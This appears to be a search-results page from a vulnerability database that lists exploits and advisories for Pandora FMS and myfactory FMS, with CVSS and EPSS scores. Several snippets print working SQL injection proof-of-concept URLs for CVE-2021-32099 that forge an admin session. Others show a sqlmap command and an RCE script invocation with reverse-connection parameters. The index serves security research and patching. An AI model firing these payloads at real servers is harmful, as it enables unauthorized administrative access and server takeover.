Lucene search
+L

1080 matches found

Kitploit
Kitploit
added 2026/09/15 4:32 a.m.6 views

exploit-CVE-2020-5844

Exploit for CVE-2020-5844 Pandora FMS v7.0NG.742 - Remote Code Execution Like this repo? Give us a ⭐! For educational and authorized security research purposes only. Exploit Author @UNICORDev by @NicPWNs and @Dev-Yeoj Vulnerability Description...

7.2CVSS7.8AI score0.30254EPSS
SaveExploits6References2
Kitploit
Kitploit
added 2026/09/14 1:56 p.m.5 views

CVE-2024-11320

CVE-2024-11320 Pandora FMS リモートコード実行 CVE-2024-11320 のエクスプロイト...

9.8CVSS8.1AI score0.91046EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/14 1:05 p.m.11 views

CVE-2022-45436

CVE-2022-45436 Reflected Cross Site Scripting leading to session hijacking in pandorafms Exploit Title: Reflected Cross Site Scripting Date: 15/02/2023 Exploit Author: Damodar Naik Vendor Homepage: https://pandorafms.com/en/ Software Link: https://github.com/pandorafms/pandorafms Version: = v765 ...

6.1CVSS5.7AI score0.00614EPSS
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/14 12:25 p.m.6 views

CVE-2021-32099

CVE-2021-32099 PoC このリポジトリは、Pandora FMS 742 に影響を与える CVE-2021-32099 の脆弱性に対する Proof of Concept PoC エクスプロイトを提供します。このエクスプロイトは、認証されていない攻撃者がSQLインジェクションの脆弱性を悪用して、非特権セッションを管理者レベルのアカウントに昇格させる方法を示しています。管理者アクセスを取得すると、攻撃者はPandora FMSのファイルマネージャーを介して任意のPHPファイルをアップロードでき、リモートコード実行につながり、Webサーバーユーザーとしてサーバーを侵害します。 ...

9.8CVSS8AI score0.12708EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/14 5:29 a.m.6 views

pandorafms_7.44

Pandora FMS 7.44 CVE-2020-13851 Pandora FMS 7.44 CVE-2020-13851 RCE は、認証済みユーザーがイベント機能を介してリモートコマンド実行を達成できるようにします。資格情報またはPHPセッションクッキーのいずれかで実行可能です。 はじめに プログラムの実行 資格情報を使用する場合 root@kitploit: python3 pandorafms7.44.py -t http://pwnedpandora.com/ -u username -p password -lhost 127.0.0.1 -lport 1337...

9CVSS7.9AI score0.90993EPSS
SaveExploits4
Nuclei
Nuclei
added 2026/09/13 4:24 p.m.70 views

myfactory FMS - Cross-Site Scripting

myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter. id: CVE-2021-42566 info: name: myfactory FMS - Cross-Site Scripting author: madrobot,daffainfo severity: medium description: | myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter. impact...

6.1CVSS6.2AI score0.05832EPSS
SaveExploits3References2
Nuclei
Nuclei
added 2026/09/13 4:24 p.m.83 views

myfactory FMS - Cross-Site Scripting

myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter. id: CVE-2021-42565 info: name: myfactory FMS - Cross-Site Scripting author: madrobot,daffainfo severity: medium description: | myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter. impact: |...

6.1CVSS6.2AI score0.05832EPSS
SaveExploits3References3
Nuclei
Nuclei
added 2026/09/13 4:24 p.m.26 views

Pandora FMS <=7.0NG.722 - Remote Code Execution

Pandora FMS versions =7.0NG.722 are vulnerable to unauthenticated remote code execution by chaining an unrestricted file upload CVE-2018-11221 and a local file inclusion CVE-2018-11222. An attacker can upload a malicious PHP file as a plugin and execute it via LFI, leading to full compromise of t...

9.8CVSS7.8AI score0.06534EPSS
SaveExploits1References3
Kitploit
Kitploit
added 2026/09/10 1:30 a.m.12 views

CVE-2021-32099_SQLi

CVE-2021-32099 SQLi 绕过登录 在尝试读取 Pandora.htb 上的 User Flag 时非常有用 CVE-2021-32099 SQLi 允许攻击者绕过登录。 目标 利用目标:Pandora FMS v7.0NG.742FIXPERL2020 分析 从 cvedetail 中读取。我们知道目标端点:http://localhost:8000/pandoraconsole/include/chartgenerator.php?sessionid=PayloadHere = 访问被拒绝。 sqlmap -r req.txt -p sessionid...

9.8CVSS8.2AI score0.12708EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/10 1:03 a.m.11 views

CVE-2021-32099

CVE-2021-32099 CVE-2021-32099 POC : http://localhost:8000/pandoraconsole/include/chartgenerator.php?sessionid=a%27%20UNION%20SELECT%20%27a%27,1,%27idusuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessionsphp%20WHERE%20%271%27=%271 详情 :...

9.8CVSS8.1AI score0.12708EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/10 12:57 a.m.9 views

CVE-2021-32099

CVE-2021-32099 pandora fms 742 sqli(预认证)POC root@kitploit: http://localhost/pandoraconsole/include/chartgenerator.php?sessionid=a' UNION SELECT 'a',1,'idusuario|s:5:"admin";' as data FROM tsessionsphp WHERE '1'='1 URL 编码 root@kitploit:...

9.8CVSS8.2AI score0.12708EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/09 3:18 a.m.10 views

CVE-2021-32099

poc : http://127.0.0.1:8888/pandoraconsole/include/chartgenerator.php?sessionid=%27%20union%20SELECT%201,2,%27idusuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained...

9.8CVSS8.8AI score0.12708EPSS
SaveExploits2
Nuclei
Nuclei
added 2026/09/07 6:34 a.m.37 views

Pandora v7.0NG.777.3 - Remote Code Execution

Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism.This issue affects Pandora FMS- from 700 through =777.4 id: CVE-2024-11320 info: name: Pandora v7.0NG.777.3 - Remote Code Execution author: DhiyaneshDK,Shubham...

9.8CVSS8AI score0.91046EPSS
SaveExploits2References2
OSV
OSV
added 2026/08/17 9:00 p.m.9 views

CVE-2026-75531 Stored Cross-Site Scripting in URL Observables via Lookyloo Submission Handler in Pandora

Pandora contains a stored cross-site scripting XSS vulnerability in the rendering of URL observables. A URL extracted from or associated with an analyzed file was inserted directly into the inline JavaScript onclick handler used by the Submit to Lookyloo action. Although the value was subject to...

7CVSS5.4AI score
SaveExploits0References4
RedhatCVE
RedhatCVE
added 2026/06/05 7:22 p.m.23 views

CVE-2026-34187

Improper Neutralization of Special Elements used in an SQL Command vulnerability allows SQL Injection via graph container parameter. This issue affects Pandora FMS: from 777 through 800...

9.8CVSS5.7AI score0.00274EPSS
SaveExploits0References1
RedhatCVE
RedhatCVE
added 2026/06/05 7:21 p.m.19 views

CVE-2026-30810

Server-Side Request Forgery vulnerability allows Privilege Escalation via API Checker extension. This issue affects Pandora FMS: from 777 through 800...

8.8CVSS5.5AI score0.00302EPSS
SaveExploits0References1
RedhatCVE
RedhatCVE
added 2026/06/05 7:21 p.m.19 views

CVE-2026-30805

Insecure Default Initialization of Resource vulnerability allows Authentication Bypass via API access. This issue affects Pandora FMS: from 777 through 800...

9.1CVSS5.5AI score0.00341EPSS
SaveExploits0References1
RedhatCVE
RedhatCVE
added 2026/06/05 7:21 p.m.20 views

CVE-2026-30807

Cross-Site Request Forgery vulnerability allows an attacker to perform unauthorized actions via crafted web page. This issue affects Pandora FMS: from 777 through 800...

8.8CVSS5.5AI score0.00144EPSS
SaveExploits0References1
EUVD
EUVD
added 2026/05/12 6:30 p.m.26 views

EUVD-2026-29512

Improper Neutralization of Special Elements used in an SQL Command vulnerability allows SQL Injection via graph container parameter. This issue affects Pandora FMS: from 777 through 800...

7.6CVSS5.9AI score0.00274EPSS
SaveExploits0References2
EUVD
EUVD
added 2026/05/12 6:30 p.m.34 views

EUVD-2026-29497

Server-Side Request Forgery vulnerability allows Privilege Escalation via API Checker extension. This issue affects Pandora FMS: from 777 through 800...

7.1CVSS5.8AI score0.00302EPSS
SaveExploits0References2
Rows per page
Query Builder